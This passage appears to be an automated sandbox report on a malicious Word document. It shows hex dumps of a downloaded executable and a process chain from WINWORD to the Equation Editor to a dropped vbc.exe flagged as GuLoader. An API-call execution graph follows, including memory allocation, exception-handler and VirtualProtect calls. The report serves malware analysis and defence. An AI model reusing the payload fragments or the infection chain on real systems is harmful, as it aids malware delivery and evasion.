                                              Data Ascii: fuSjUY;YUu;|~;sEvEjjUuYUYE$L-@_+X;tSC#323;;u3;t;t3F;t3E
                                              Jan 27, 2022 10:55:12.695590019 CET7INData Raw: ff 75 ac eb 47 53 e8 fc 0d 00 00 8b f0 56 6a eb e8 eb 35 00 00 56 e8 66 3b 00 00 8b f0 3b f3 0f 84 6a 09 00 00 39 5d d8 74 21 56 e8 e6 49 00 00 39 5d d4 7c 0b 50 ff 75 f4 e8 a7 44 00 00 eb 0b 3b c3 74 07 c7 45 fc 01 00 00 00 56 ff 15 24 81 40 00
                                              Data Ascii: uGSVj5Vf;;j9]t!VI9]|PuD;tEV$@4jPpH;tvupDvQEffjuMEQPjHEf;fEVj@8@;EjHjEHuEVSuUt
                                              Jan 27, 2022 10:55:12.695642948 CET8INData Raw: 00 8d 44 00 02 83 fe 04 75 12 6a 03 e8 9a 08 00 00 59 a3 f0 b5 40 00 56 89 55 c8 58 83 fe 03 75 0f 68 00 18 00 00 57 53 ff 75 dc e8 ab 0d 00 00 50 57 ff 75 f0 53 ff 75 bc ff 75 08 ff 15 0c 80 40 00 85 c0 75 03 89 5d fc ff 75 08 e9 d3 00 00 00 68
                                              Data Ascii: DujY@VUXuhWSuPWuSuu@u]uhj3i;fMEQMWQSPV@3Au.}t9Mt}uEEt739]WE>ffM^h>j;YUfn9]Mt
                                              Jan 27, 2022 10:55:12.695693016 CET10INData Raw: e8 c7 36 00 00 57 ff 15 34 81 40 00 83 4d c8 ff 53 53 ff 75 08 ff 75 c8 e8 84 08 00 00 ff 75 08 8b f8 ff 15 24 81 40 00 6a f3 3b fb 5e 7d 13 6a ef 5e ff 75 c0 ff 15 70 81 40 00 c7 45 fc 01 00 00 00 56 e9 96 f8 ff ff 53 e8 23 03 00 00 8b f8 59 3b
                                              Data Ascii: 6W4@MSSuuu$@j;^}j^up@EVS#Y;=,OCUEi5(OC;|uVu:Q+MtjYUEuFP:NEM9]JW?S YU09]t"9]
                                              Jan 27, 2022 10:55:12.695746899 CET11INData Raw: 74 d0 ff 75 fc ff 15 10 80 40 00 6a 03 e8 ab 39 00 00 85 c0 75 1e ff 75 0c ff 75 08 ff 15 18 80 40 00 eb 1b ff 75 fc ff 15 10 80 40 00 b8 eb 03 00 00 eb 0b 6a 00 56 ff 75 0c ff 75 08 ff d0 5f 5e 5b c9 c2 0c 00 55 8b ec 81 ec 80 00 00 00 81 7d 0c
                                              Data Ascii: tu@j9uuu@u@jVuu_^[U}ujhju@@E}uLA$B;rPjdQ@PEh@PT@EPuD@EPhuh+3V39t$t B;tP8@5 B^95 B
                                              Jan 27, 2022 10:55:12.695796967 CET13INData Raw: 00 00 00 85 c0 74 2f 56 57 ff 75 0c e8 47 2c 00 00 85 c0 74 c8 01 75 fc 29 75 14 83 7d 14 00 7f cc eb 1b 39 75 14 7d 03 8b 75 14 56 57 e8 16 00 00 00 85 c0 75 05 6a fd 58 eb 06 89 75 fc 8b 45 fc 5f 5e 5b c9 c2 10 00 ff 74 24 08 ff 74 24 08 ff 35
                                              Data Ascii: t/VWuG,tu)u}9u}uVWujXuE_^[t$t$5@+jjt$5@`@V(DV2Vu)u^V(V%Vh D1+^USVWj _3h]E@]@5@P]]
                                              Jan 27, 2022 10:55:12.695853949 CET14INData Raw: 78 2b 00 00 0f b7 05 5a a2 40 00 0f b7 0d 58 a2 40 00 c1 e0 10 0b c1 c7 45 f8 1a 00 00 00 a3 00 68 43 00 bf 28 aa 42 00 a1 10 4f 43 00 ff b0 20 01 00 00 57 e8 80 2b 00 00 57 ff 15 70 81 40 00 39 5d fc 74 3e 6a 01 57 68 00 38 44 00 ff 15 e4 80 40
                                              Data Ascii: x+Z@X@EhC(BOC W+Wp@9]t>jWh8D@t,SW(OC$WJ+W ;tP$@]fhCMuSV(3@9]th u'!j@9OCtvEPj(@P$@t/EPh0@S @SSESP
                                              Jan 27, 2022 10:55:12.810214996 CET16INData Raw: 29 66 33 e8 23 eb 66 85 ed 74 06 85 f6 75 ec eb 19 8b 51 02 89 15 e0 3e 43 00 8b 51 06 89 15 a8 4f 43 00 8d 51 0a 85 d2 75 12 66 81 fb ff ff 75 07 bb ff 03 00 00 eb a3 33 db eb 9f 89 15 dc 3e 43 00 0f b7 01 50 57 e8 3d 25 00 00 e8 2f 00 00 00 a1
                                              Data Ascii: )f3#ftuQ>CQOCQufu3>CPW=%/,OC5(OCttPFP&Ou_^][V?CjV%V5HBD@^SUVt$$;WaU|$$3GujUUUUW5HB@\$,uBH


                                              Click to jump to process

                                              Click to jump to process

                                              Click to dive into process behavior distribution

                                              Click to jump to process

                                              Target ID:0
                                              Start time:10:54:20
                                              Start date:27/01/2022
                                              Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                              Imagebase:0x13fdf0000
                                              File size:1423704 bytes
                                              MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Target ID:1
                                              Start time:10:54:21
                                              Start date:27/01/2022
                                              Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                              Imagebase:0x400000
                                              File size:543304 bytes
                                              MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Target ID:3
                                              Start time:10:54:24
                                              Start date:27/01/2022
                                              Path:C:\Users\Public\vbc.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\Public\vbc.exe"
                                              Imagebase:0x400000
                                              File size:95632 bytes
                                              MD5 hash:82C5CDDE9DF0A76E2933C1CD8BFC7887
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000003.00000002.688715798.0000000003790000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Antivirus matches:
                                              • Detection: 11%, Metadefender, Browse
                                              • Detection: 21%, ReversingLabs
                                              Reputation:low

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:10.9%
                                                Dynamic/Decrypted Code Coverage:17.9%
                                                Signature Coverage:23.4%
                                                Total number of Nodes:1914
                                                Total number of Limit Nodes:31
                                                execution_graph 5535 401941 5536 401943 5535->5536 5541 402da6 5536->5541 5542 402db2 5541->5542 5587 40657a 5542->5587 5545 401948 5547 405c49 5545->5547 5629 405f14 5547->5629 5550 405c71 DeleteFileW 5552 401951 5550->5552 5551 405c88 5553 405db3 5551->5553 5643 40653d lstrcpynW 5551->5643 5553->5552 5672 406873 FindFirstFileW 5553->5672 5555 405cae 5556 405cc1 5555->5556 5557 405cb4 lstrcatW 5555->5557 5644 405e58 lstrlenW 5556->5644 5559 405cc7 5557->5559 5562 405cd7 lstrcatW 5559->5562 5563 405ccd 5559->5563 5564 405ce2 lstrlenW FindFirstFileW 5562->5564 5563->5562 5563->5564 5566 405da8 5564->5566 5585 405d04 5564->5585 5565 405dd1 5675 405e0c lstrlenW CharPrevW 5565->5675 5566->5553 5569 405d8b FindNextFileW 5573 405da1 FindClose 5569->5573 5569->5585 5570 405c01 5 API calls 5572 405de3 5570->5572 5574 405de7 5572->5574 5575 405dfd 5572->5575 5573->5566 5574->5552 5578 40559f 24 API calls 5574->5578 5577 40559f 24 API calls 5575->5577 5577->5552 5580 405df4 5578->5580 5579 405c49 60 API calls 5579->5585 5582 4062fd 36 API calls 5580->5582 5581 40559f 24 API calls 5581->5569 5584 405dfb 5582->5584 5584->5552 5585->5569 5585->5579 5585->5581 5648 40653d lstrcpynW 5585->5648 5649 405c01 5585->5649 5657 40559f 5585->5657 5668 4062fd MoveFileExW 5585->5668 5591 406587 5587->5591 5588 4067aa 5589 402dd3 5588->5589 5620 40653d lstrcpynW 5588->5620 5589->5545 5604 4067c4 5589->5604 5591->5588 5592 406778 lstrlenW 5591->5592 5593 40668f GetSystemDirectoryW 5591->5593 5597 40657a 10 API calls 5591->5597 5598 4066a2 GetWindowsDirectoryW 5591->5598 5599 4067c4 5 API calls 5591->5599 5600 4066d1 SHGetSpecialFolderLocation 5591->5600 5601 406719 lstrcatW 5591->5601 5602 40657a 10 API calls 5591->5602 5613 40640b 5591->5613 5618 406484 wsprintfW 5591->5618 5619 40653d lstrcpynW 5591->5619 5592->5591 5593->5591 5597->5592 5598->5591 5599->5591 5600->5591 5603 4066e9 SHGetPathFromIDListW CoTaskMemFree 5600->5603 5601->5591 5602->5591 5603->5591 5610 4067d1 5604->5610 5605 406847 5606 40684c CharPrevW 5605->5606 5608 40686d 5605->5608 5606->5605 5607 40683a CharNextW 5607->5605 5607->5610 5608->5545 5610->5605 5610->5607 5611 406826 CharNextW 5610->5611 5612 406835 CharNextW 5610->5612 5625 405e39 5610->5625 5611->5610 5612->5607 5621 4063aa 5613->5621 5616 40646f 5616->5591 5617 40643f RegQueryValueExW RegCloseKey 5617->5616 5618->5591 5619->5591 5620->5589 5622 4063b9 5621->5622 5623 4063c2 RegOpenKeyExW 5622->5623 5624 4063bd 5622->5624 5623->5624 5624->5616 5624->5617 5626 405e3f 5625->5626 5627 405e55 5626->5627 5628 405e46 CharNextW 5626->5628 5627->5610 5628->5626 5678 40653d lstrcpynW 5629->5678 5631 405f25 5679 405eb7 CharNextW CharNextW 5631->5679 5634 405c69 5634->5550 5634->5551 5635 4067c4 5 API calls 5641 405f3b 5635->5641 5636 405f6c lstrlenW 5637 405f77 5636->5637 5636->5641 5638 405e0c 3 API calls 5637->5638 5640 405f7c GetFileAttributesW 5638->5640 5639 406873 2 API calls 5639->5641 5640->5634 5641->5634 5641->5636 5641->5639 5642 405e58 2 API calls 5641->5642 5642->5636 5643->5555 5645 405e66 5644->5645 5646 405e78 5645->5646 5647 405e6c CharPrevW 5645->5647 5646->5559 5647->5645 5647->5646 5648->5585 5685 406008 GetFileAttributesW 5649->5685 5651 405c2e 5651->5585 5653 405c24 DeleteFileW 5655 405c2a 5653->5655 5654 405c1c RemoveDirectoryW 5654->5655 5655->5651 5656 405c3a SetFileAttributesW 5655->5656 5656->5651 5659 4055ba 5657->5659 5667 40565c 5657->5667 5658 4055d6 lstrlenW 5661 4055e4 lstrlenW 5658->5661 5662 4055ff 5658->5662 5659->5658 5660 40657a 17 API calls 5659->5660 5660->5658 5663 4055f6 lstrcatW 5661->5663 5661->5667 5664 405612 5662->5664 5665 405605 SetWindowTextW 5662->5665 5663->5662 5666 405618 SendMessageW SendMessageW SendMessageW 5664->5666 5664->5667 5665->5664 5666->5667 5667->5585 5669 40631e 5668->5669 5670 406311 5668->5670 5669->5585 5688 406183 5670->5688 5673 405dcd 5672->5673 5674 406889 FindClose 5672->5674 5673->5552 5673->5565 5674->5673 5676 405dd7 5675->5676 5677 405e28 lstrcatW 5675->5677 5676->5570 5677->5676 5678->5631 5680 405ed4 5679->5680 5682 405ee6 5679->5682 5681 405ee1 CharNextW 5680->5681 5680->5682 5684 405f0a 5681->5684 5683 405e39 CharNextW 5682->5683 5682->5684 5683->5682 5684->5634 5684->5635 5686 405c0d 5685->5686 5687 40601a SetFileAttributesW 5685->5687 5686->5651 5686->5653 5686->5654 5687->5686 5689 4061b3 5688->5689 5690 4061d9 GetShortPathNameW 5688->5690 5715 40602d GetFileAttributesW CreateFileW 5689->5715 5692 4062f8 5690->5692 5693 4061ee 5690->5693 5692->5669 5693->5692 5695 4061f6 wsprintfA 5693->5695 5694 4061bd CloseHandle GetShortPathNameW 5694->5692 5696 4061d1 5694->5696 5697 40657a 17 API calls 5695->5697 5696->5690 5696->5692 5698 40621e 5697->5698 5716 40602d GetFileAttributesW CreateFileW 5698->5716 5700 40622b 5700->5692 5701 40623a GetFileSize GlobalAlloc 5700->5701 5702 4062f1 CloseHandle 5701->5702 5703 40625c 5701->5703 5702->5692 5717 4060b0 ReadFile 5703->5717 5708 40627b lstrcpyA 5711 40629d 5708->5711 5709 40628f 5710 405f92 4 API calls 5709->5710 5710->5711 5712 4062d4 SetFilePointer 5711->5712 5724 4060df WriteFile 5712->5724 5715->5694 5716->5700 5718 4060ce 5717->5718 5718->5702 5719 405f92 lstrlenA 5718->5719 5720 405fd3 lstrlenA 5719->5720 5721 405fdb 5720->5721 5722 405fac lstrcmpiA 5720->5722 5721->5708 5721->5709 5722->5721 5723 405fca CharNextA 5722->5723 5723->5720 5725 4060fd GlobalFree 5724->5725 5725->5702 6488 379237b 6493 3795694 6488->6493 6490 3792386 6491 3795694 2 API calls 6490->6491 6492 37923bf 6491->6492 6494 37956a4 6493->6494 6497 379581e 6493->6497 6495 3796a18 GetPEB 6494->6495 6496 379571c NtAllocateVirtualMemory 6495->6496 6496->6497 6497->6490 7109 379187b 7110 3795056 7109->7110 7111 379812b RtlAddVectoredExceptionHandler 7110->7111 7112 37950a5 7111->7112 6498 401c43 6499 402d84 17 API calls 6498->6499 6500 401c4a 6499->6500 6501 402d84 17 API calls 6500->6501 6502 401c57 6501->6502 6503 401c6c 6502->6503 6504 402da6 17 API calls 6502->6504 6505 401c7c 6503->6505 6506 402da6 17 API calls 6503->6506 6504->6503 6507 401cd3 6505->6507 6508 401c87 6505->6508 6506->6505 6509 402da6 17 API calls 6507->6509 6510 402d84 17 API calls 6508->6510 6511 401cd8 6509->6511 6512 401c8c 6510->6512 6513 402da6 17 API calls 6511->6513 6514 402d84 17 API calls 6512->6514 6515 401ce1 FindWindowExW 6513->6515 6516 401c98 6514->6516 6519 401d03 6515->6519 6517 401cc3 SendMessageW 6516->6517 6518 401ca5 SendMessageTimeoutW 6516->6518 6517->6519 6518->6519 7113 404943 7114 404953 7113->7114 7115 404979 7113->7115 7117 404499 18 API calls 7114->7117 7116 404500 8 API calls 7115->7116 7118 404985 7116->7118 7119 404960 SetDlgItemTextW 7117->7119 7119->7115 6523 401e4e GetDC 6524 402d84 17 API calls 6523->6524 6525 401e60 GetDeviceCaps MulDiv ReleaseDC 6524->6525 6526 402d84 17 API calls 6525->6526 6527 401e91 6526->6527 6528 40657a 17 API calls 6527->6528 6529 401ece CreateFontIndirectW 6528->6529 6530 402638 6529->6530 7120 402950 7121 402da6 17 API calls 7120->7121 7123 40295c 7121->7123 7122 402972 7124 406008 2 API calls 7122->7124 7123->7122 7125 402da6 17 API calls 7123->7125 7126 402978 7124->7126 7125->7122 7148 40602d GetFileAttributesW CreateFileW 7126->7148 7128 402985 7129 402a3b 7128->7129 7130 4029a0 GlobalAlloc 7128->7130 7131 402a23 7128->7131 7132 402a42 DeleteFileW 7129->7132 7133 402a55 7129->7133 7130->7131 7134 4029b9 7130->7134 7135 4032b4 31 API calls 7131->7135 7132->7133 7149 4034e5 SetFilePointer 7134->7149 7137 402a30 CloseHandle 7135->7137 7137->7129 7138 4029bf 7139 4034cf ReadFile 7138->7139 7140 4029c8 GlobalAlloc 7139->7140 7141 4029d8 7140->7141 7142 402a0c 7140->7142 7144 4032b4 31 API calls 7141->7144 7143 4060df WriteFile 7142->7143 7145 402a18 GlobalFree 7143->7145 7147 4029e5 7144->7147 7145->7131 7146 402a03 GlobalFree 7146->7142 7147->7146 7148->7128 7149->7138 7150 7328103d 7153 7328101b 7150->7153 7154 732815b6 GlobalFree 7153->7154 7155 73281020 7154->7155 7156 73281024 7155->7156 7157 73281027 GlobalAlloc 7155->7157 7158 732815dd 3 API calls 7156->7158 7157->7156 7159 7328103b 7158->7159 7160 401956 7161 402da6 17 API calls 7160->7161 7162 40195d lstrlenW 7161->7162 7163 402638 7162->7163 6534 404658 6535 404670 6534->6535 6536 40478a 6534->6536 6539 404499 18 API calls 6535->6539 6537 4047f4 6536->6537 6540 4048be 6536->6540 6545 4047c5 GetDlgItem SendMessageW 6536->6545 6538 4047fe GetDlgItem 6537->6538 6537->6540 6541 404818 6538->6541 6542 40487f 6538->6542 6543 4046d7 6539->6543 6544 404500 8 API calls 6540->6544 6541->6542 6549 40483e SendMessageW LoadCursorW SetCursor 6541->6549 6542->6540 6550 404891 6542->6550 6547 404499 18 API calls 6543->6547 6548 4048b9 6544->6548 6567 4044bb KiUserCallbackDispatcher 6545->6567 6552 4046e4 CheckDlgButton 6547->6552 6571 404907 6549->6571 6554 4048a7 6550->6554 6555 404897 SendMessageW 6550->6555 6551 4047ef 6568 4048e3 6551->6568 6565 4044bb KiUserCallbackDispatcher 6552->6565 6554->6548 6559 4048ad SendMessageW 6554->6559 6555->6554 6559->6548 6560 404702 GetDlgItem 6566 4044ce SendMessageW 6560->6566 6562 404718 SendMessageW 6563 404735 GetSysColor 6562->6563 6564 40473e SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 6562->6564 6563->6564 6564->6548 6565->6560 6566->6562 6567->6551 6569 4048f1 6568->6569 6570 4048f6 SendMessageW 6568->6570 6569->6570 6570->6537 6574 405b63 ShellExecuteExW 6571->6574 6573 40486d LoadCursorW SetCursor 6573->6542 6574->6573 7164 402b59 7165 402b60 7164->7165 7166 402bab 7164->7166 7168 402d84 17 API calls 7165->7168 7171 402ba9 7165->7171 7167 40690a 5 API calls 7166->7167 7169 402bb2 7167->7169 7170 402b6e 7168->7170 7172 402da6 17 API calls 7169->7172 7173 402d84 17 API calls 7170->7173 7174 402bbb 7172->7174 7175 402b7a 7173->7175 7174->7171 7176 402bbf IIDFromString 7174->7176 7181 406484 wsprintfW 7175->7181 7176->7171 7177 402bce 7176->7177 7177->7171 7182 40653d lstrcpynW 7177->7182 7179 402beb CoTaskMemFree 7179->7171 7181->7171 7182->7179 6421 40175c 6422 402da6 17 API calls 6421->6422 6423 401763 6422->6423 6424 40605c 2 API calls 6423->6424 6425 40176a 6424->6425 6426 40605c 2 API calls 6425->6426 6426->6425 7183 401d5d 7184 402d84 17 API calls 7183->7184 7185 401d6e SetWindowLongW 7184->7185 7186 402c2a 7185->7186 7187 3797658 7194 3793ee9 7187->7194 7188 3796cd9 GetPEB 7190 3796a96 7188->7190 7189 3797564 4 API calls 7189->7194 7191 37950c1 7191->7188 7191->7190 7192 3794bd0 2 API calls 7192->7194 7193 3790903 7194->7189 7194->7191 7194->7192 7194->7193 7195 379812b RtlAddVectoredExceptionHandler 7194->7195 7196 3794b2b 7194->7196 7198 379425b 7194->7198 7195->7194 7197 379812b RtlAddVectoredExceptionHandler 7196->7197 7199 3794b3c 7197->7199 7200 3794f3f 2 API calls 7198->7200 7201 379812b RtlAddVectoredExceptionHandler 7199->7201 7205 379427a 7200->7205 7202 3794b4a 7201->7202 7203 379812b RtlAddVectoredExceptionHandler 7202->7203 7204 3794b80 7203->7204 7206 379812b RtlAddVectoredExceptionHandler 7204->7206 7205->7191 7207 379812b RtlAddVectoredExceptionHandler 7205->7207 7208 3794bb8 7206->7208 7209 3794497 7207->7209 7209->7196 7210 379096b 7209->7210 7211 379812b RtlAddVectoredExceptionHandler 7209->7211 7212 37945b5 7211->7212 7212->7196 7213 379812b RtlAddVectoredExceptionHandler 7212->7213 7214 3794749 7213->7214 7214->7196 7215 37950c1 GetPEB 7214->7215 7216 3794992 7215->7216 7216->7191 7216->7196 7217 37949eb 7216->7217 7218 379812b RtlAddVectoredExceptionHandler 7217->7218 7219 3794a2b 7218->7219 7219->7196 7220 379812b RtlAddVectoredExceptionHandler 7219->7220 7221 3794a96 7220->7221 7221->7196 7222 3794ac6 7221->7222 7223 379812b RtlAddVectoredExceptionHandler 7222->7223 7224 3794afc 7223->7224 7225 379812b RtlAddVectoredExceptionHandler 7224->7225 7226 3794b2a 7225->7226 7227 401563 7228 402ba4 7227->7228 7231 406484 wsprintfW 7228->7231 7230 402ba9 7231->7230 6575 7328170d 6581 732815b6 6575->6581 6577 7328176b GlobalFree 6578 73281725 6578->6577 6579 73281740 6578->6579 6580 73281757 VirtualFree 6578->6580 6579->6577 6580->6577 6583 732815bc 6581->6583 6582 732815c2 6582->6578 6583->6582 6584 732815ce GlobalFree 6583->6584 6584->6578 7232 401968 7233 402d84 17 API calls 7232->7233 7234 40196f 7233->7234 7235 402d84 17 API calls 7234->7235 7236 40197c 7235->7236 7237 402da6 17 API calls 7236->7237 7238 401993 lstrlenW 7237->7238 7240 4019a4 7238->7240 7239 4019e5 7240->7239 7244 40653d lstrcpynW 7240->7244 7242 4019d5 7242->7239 7243 4019da lstrlenW 7242->7243 7243->7239 7244->7242 7245 73281000 7246 7328101b 5 API calls 7245->7246 7247 73281019 7246->7247 6585 40166a 6586 402da6 17 API calls 6585->6586 6587 401670 6586->6587 6588 406873 2 API calls 6587->6588 6589 401676 6588->6589 6069 40176f 6070 402da6 17 API calls 6069->6070 6071 401776 6070->6071 6072 401796 6071->6072 6073 40179e 6071->6073 6108 40653d lstrcpynW 6072->6108 6109 40653d lstrcpynW 6073->6109 6076 40179c 6080 4067c4 5 API calls 6076->6080 6077 4017a9 6078 405e0c 3 API calls 6077->6078 6079 4017af lstrcatW 6078->6079 6079->6076 6089 4017bb 6080->6089 6081 406873 2 API calls 6081->6089 6082 406008 2 API calls 6082->6089 6084 4017cd CompareFileTime 6084->6089 6085 40188d 6086 40559f 24 API calls 6085->6086 6088 401897 6086->6088 6087 40559f 24 API calls 6097 401879 6087->6097 6090 4032b4 31 API calls 6088->6090 6089->6081 6089->6082 6089->6084 6089->6085 6091 40653d lstrcpynW 6089->6091 6095 40657a 17 API calls 6089->6095 6102 405b9d MessageBoxIndirectW 6089->6102 6105 401864 6089->6105 6107 40602d GetFileAttributesW CreateFileW 6089->6107 6092 4018aa 6090->6092 6091->6089 6093 4018be SetFileTime 6092->6093 6094 4018d0 CloseHandle 6092->6094 6093->6094 6096 4018e1 6094->6096 6094->6097 6095->6089 6098 4018e6 6096->6098 6099 4018f9 6096->6099 6100 40657a 17 API calls 6098->6100 6101 40657a 17 API calls 6099->6101 6103 4018ee lstrcatW 6100->6103 6104 401901 6101->6104 6102->6089 6103->6104 6104->6097 6106 405b9d MessageBoxIndirectW 6104->6106 6105->6087 6105->6097 6106->6097 6107->6089 6108->6076 6109->6077 6590 3792749 6591 379276a 6590->6591 6592 37927bf 6590->6592 6593 37928b6 6592->6593 6595 379812b 6592->6595 6596 3798130 RtlAddVectoredExceptionHandler 6595->6596 6597 401a72 6598 402d84 17 API calls 6597->6598 6599 401a7b 6598->6599 6600 402d84 17 API calls 6599->6600 6601 401a20 6600->6601 7252 401573 7253 401583 ShowWindow 7252->7253 7254 40158c 7252->7254 7253->7254 7255 402c2a 7254->7255 7256 40159a ShowWindow 7254->7256 7256->7255 7257 379824e 7258 3798254 7257->7258 7259 3790234 RtlAddVectoredExceptionHandler 7258->7259 7260 3796a18 7259->7260 7261 3796a96 7260->7261 7262 3796cd9 GetPEB 7260->7262 7262->7261 7263 401b77 7264 402da6 17 API calls 7263->7264 7265 401b7e 7264->7265 7266 402d84 17 API calls 7265->7266 7267 401b87 wsprintfW 7266->7267 7268 402c2a 7267->7268 6602 40167b 6603 402da6 17 API calls 6602->6603 6604 401682 6603->6604 6605 402da6 17 API calls 6604->6605 6606 40168b 6605->6606 6607 402da6 17 API calls 6606->6607 6608 401694 MoveFileW 6607->6608 6609 4016a0 6608->6609 6610 4016a7 6608->6610 6612 401423 24 API calls 6609->6612 6611 406873 2 API calls 6610->6611 6614 4022f6 6610->6614 6613 4016b6 6611->6613 6612->6614 6613->6614 6615 4062fd 36 API calls 6613->6615 6615->6609 6616 401000 6617 401037 BeginPaint GetClientRect 6616->6617 6618 40100c DefWindowProcW 6616->6618 6620 4010f3 6617->6620 6623 401179 6618->6623 6621 401073 CreateBrushIndirect FillRect DeleteObject 6620->6621 6622 4010fc 6620->6622 6621->6620 6624 401102 CreateFontIndirectW 6622->6624 6625 401167 EndPaint 6622->6625 6624->6625 6626 401112 6 API calls 6624->6626 6625->6623 6626->6625 7269 3791638 7272 3791578 7269->7272 7270 3796a18 GetPEB 7271 3791637 7270->7271 7272->7269 7272->7270 7273 401503 7274 40150b 7273->7274 7276 40151e 7273->7276 7275 402d84 17 API calls 7274->7275 7275->7276 6627 402c05 SendMessageW 6628 402c2a 6627->6628 6629 402c1f InvalidateRect 6627->6629 6629->6628 7280 404f06 GetDlgItem GetDlgItem 7281 404f58 7 API calls 7280->7281 7289 40517d 7280->7289 7282 404ff2 SendMessageW 7281->7282 7283 404fff DeleteObject 7281->7283 7282->7283 7284 405008 7283->7284 7286 40503f 7284->7286 7290 40657a 17 API calls 7284->7290 7285 40525f 7288 40530b 7285->7288 7292 405170 7285->7292 7297 4052b8 SendMessageW 7285->7297 7287 404499 18 API calls 7286->7287 7291 405053 7287->7291 7293 405315 SendMessageW 7288->7293 7294 40531d 7288->7294 7289->7285 7312 4051ec 7289->7312 7334 404e54 SendMessageW 7289->7334 7295 405021 SendMessageW SendMessageW 7290->7295 7296 404499 18 API calls 7291->7296 7299 404500 8 API calls 7292->7299 7293->7294 7304 405336 7294->7304 7305 40532f ImageList_Destroy 7294->7305 7309 405346 7294->7309 7295->7284 7313 405064 7296->7313 7297->7292 7302 4052cd SendMessageW 7297->7302 7298 405251 SendMessageW 7298->7285 7303 40550c 7299->7303 7301 4054c0 7301->7292 7310 4054d2 ShowWindow GetDlgItem ShowWindow 7301->7310 7308 4052e0 7302->7308 7306 40533f GlobalFree 7304->7306 7304->7309 7305->7304 7306->7309 7307 40513f GetWindowLongW SetWindowLongW 7311 405158 7307->7311 7319 4052f1 SendMessageW 7308->7319 7309->7301 7326 405381 7309->7326 7339 404ed4 7309->7339 7310->7292 7314 405175 7311->7314 7315 40515d ShowWindow 7311->7315 7312->7285 7312->7298 7313->7307 7318 4050b7 SendMessageW 7313->7318 7320 40513a 7313->7320 7321 4050f5 SendMessageW 7313->7321 7322 405109 SendMessageW 7313->7322 7333 4044ce SendMessageW 7314->7333 7332 4044ce SendMessageW 7315->7332 7318->7313 7319->7288 7320->7307 7320->7311 7321->7313 7322->7313 7324 40548b 7325 405496 InvalidateRect 7324->7325 7329 4054a2 7324->7329 7325->7329 7327 4053af SendMessageW 7326->7327 7328 4053c5 7326->7328 7327->7328 7328->7324 7331 405439 SendMessageW SendMessageW 7328->7331 7329->7301 7348 404e0f 7329->7348 7331->7328 7332->7292 7333->7289 7335 404eb3 SendMessageW 7334->7335 7336 404e77 GetMessagePos ScreenToClient SendMessageW 7334->7336 7338 404eab 7335->7338 7337 404eb0 7336->7337 7336->7338 7337->7335 7338->7312 7351 40653d lstrcpynW 7339->7351 7341 404ee7 7352 406484 wsprintfW 7341->7352 7343 404ef1 7344 40140b 2 API calls 7343->7344 7345 404efa 7344->7345 7353 40653d lstrcpynW 7345->7353 7347 404f01 7347->7326 7354 404d46 7348->7354 7350 404e24 7350->7301 7351->7341 7352->7343 7353->7347 7355 404d5f 7354->7355 7356 40657a 17 API calls 7355->7356 7357 404dc3 7356->7357 7358 40657a 17 API calls 7357->7358 7359 404dce 7358->7359 7360 40657a 17 API calls 7359->7360 7361 404de4 lstrlenW wsprintfW SetDlgItemTextW 7360->7361 7361->7350 6630 404609 lstrlenW 6631 404628 6630->6631 6632 40462a WideCharToMultiByte 6630->6632 6631->6632 7362 40290b 7363 402da6 17 API calls 7362->7363 7364 402912 FindFirstFileW 7363->7364 7365 40293a 7364->7365 7369 402925 7364->7369 7366 402943 7365->7366 7370 406484 wsprintfW 7365->7370 7371 40653d lstrcpynW 7366->7371 7370->7366 7371->7369 7372 40190c 7373 401943 7372->7373 7374 402da6 17 API calls 7373->7374 7375 401948 7374->7375 7376 405c49 67 API calls 7375->7376 7377 401951 7376->7377 7378 40190f 7379 402da6 17 API calls 7378->7379 7380 401916 7379->7380 7381 405b9d MessageBoxIndirectW 7380->7381 7382 40191f 7381->7382 6633 73281979 6634 7328199c 6633->6634 6635 732819e3 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 6634->6635 6636 732819d1 GlobalFree 6634->6636 6637 73281312 2 API calls 6635->6637 6636->6635 6638 73281b6e GlobalFree GlobalFree 6637->6638 6110 379812b 6112 3798130 6110->6112 6113 379815e 6112->6113 6113->6113 6114 379816d RtlAddVectoredExceptionHandler 6113->6114 6115 3798183 6114->6115 6115->6115 7383 401f12 7384 402da6 17 API calls 7383->7384 7385 401f18 7384->7385 7386 402da6 17 API calls 7385->7386 7387 401f21 7386->7387 7388 402da6 17 API calls 7387->7388 7389 401f2a 7388->7389 7390 402da6 17 API calls 7389->7390 7391 401f33 7390->7391 7392 401423 24 API calls 7391->7392 7393 401f3a 7392->7393 7400 405b63 ShellExecuteExW 7393->7400 7395 401f82 7397 40292e 7395->7397 7401 4069b5 WaitForSingleObject 7395->7401 7398 401f9f CloseHandle 7398->7397 7400->7395 7402 4069cf 7401->7402 7403 4069e1 GetExitCodeProcess 7402->7403 7404 406946 2 API calls 7402->7404 7403->7398 7405 4069d6 WaitForSingleObject 7404->7405 7405->7402 7406 405513 7407 405523 7406->7407 7408 405537 7406->7408 7410 405580 7407->7410 7411 405529 7407->7411 7409 40553f IsWindowVisible 7408->7409 7417 405556 7408->7417 7409->7410 7413 40554c 7409->7413 7414 405585 CallWindowProcW 7410->7414 7412 4044e5 SendMessageW 7411->7412 7415 405533 7412->7415 7416 404e54 5 API calls 7413->7416 7414->7415 7416->7417 7417->7414 7418 404ed4 4 API calls 7417->7418 7418->7410 6116 73282a7f 6117 73282acf 6116->6117 6118 73282a8f VirtualProtect 6116->6118 6118->6117 7419 401d17 7420 402d84 17 API calls 7419->7420 7421 401d1d IsWindow 7420->7421 7422 401a20 